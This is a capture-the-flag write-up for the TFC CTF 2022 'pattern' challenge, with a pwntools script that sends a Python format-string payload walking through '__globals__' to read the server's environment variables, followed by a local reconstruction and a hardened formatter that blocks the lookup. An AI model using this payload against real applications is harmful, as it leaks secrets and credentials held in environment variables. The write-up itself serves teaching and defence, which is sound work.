pattern
This task was part of the TFC CTF 2022 competition.
This is a basic command injection challenge. Review the provided source code, and you'll find that you need to exploit the message object of the Message class.
The source code shows that the __repr__ method is being set to the same function as __str__. This means that when repr(message) or str(message) is called, it returns the message string. So you need to manipulate how the message string is processed.
from pwn import * 
import re 
# avoid warnings when you run the python code
import warnings
warnings.filterwarnings("ignore")
server_IP = "34.107.71.117"
server_port = 30840
# Open connection
connection = remote(server_IP,server_port)
# payload used to get the flag
payload = '{message.__class__.__init__.__globals__[os].environ}'
# send payload
connection.sendlineafter("pattern> ",payload)
connection.sendlineafter("count> ",'1')
# get response and print the output 
response = connection.recvline()
#print(response.decode())
# Search for flag
flag = re.search(r'flag\{.*?\}', response.decode())
if flag:
    print(f"Flag found: {flag.group(0)}")
else:
    print("Flag not found.")
# close the connection
connection.close()
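A local reconstruction of why the payload above works and how to block it, added here as an example and not taken from the challenge's source. The `Message` class, the `render_*` functions and `FlatFormatter` are hypothetical, and it assumes the server passes the pattern to `str.format` with `message` as a keyword argument.

```python
import os  # must be in this module's globals for the payload's [os] lookup
import string

# Payload from the write-up above.
PAYLOAD = "{message.__class__.__init__.__globals__[os].environ}"


class Message:
    """Constructed stand-in for the challenge's Message class."""

    def __init__(self, text):
        self.text = text

    def __str__(self):
        return self.text

    __repr__ = __str__  # same aliasing the write-up describes


def render_vulnerable(pattern, message):
    # User input is the format string, so fields may walk attributes and keys:
    # message -> class -> __init__ -> __globals__ -> os module -> environ.
    return pattern.format(message=message)


class FlatFormatter(string.Formatter):
    """Accepts only plain field names such as {message}; no '.attr' or '[key]'."""

    def get_field(self, field_name, args, kwargs):
        if not field_name.isidentifier():
            raise ValueError(f"field {field_name!r} is not allowed")
        return super().get_field(field_name, args, kwargs)


def render_hardened(pattern, message):
    return FlatFormatter().format(pattern, message=message)


def is_blocked(pattern, message):
    """True when the hardened renderer refuses the pattern."""
    try:
        render_hardened(pattern, message)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    os.environ["DEMO_SECRET"] = "constructed-value"  # constructed sample secret
    msg = Message("hello")
    print("leaks:", "constructed-value" in render_vulnerable(PAYLOAD, msg))
    print("blocked:", is_blocked(PAYLOAD, msg))
```

The stronger fix is to keep the format string constant and pass user input only as a value; the restricted formatter is for cases where user-supplied templates are a requirement.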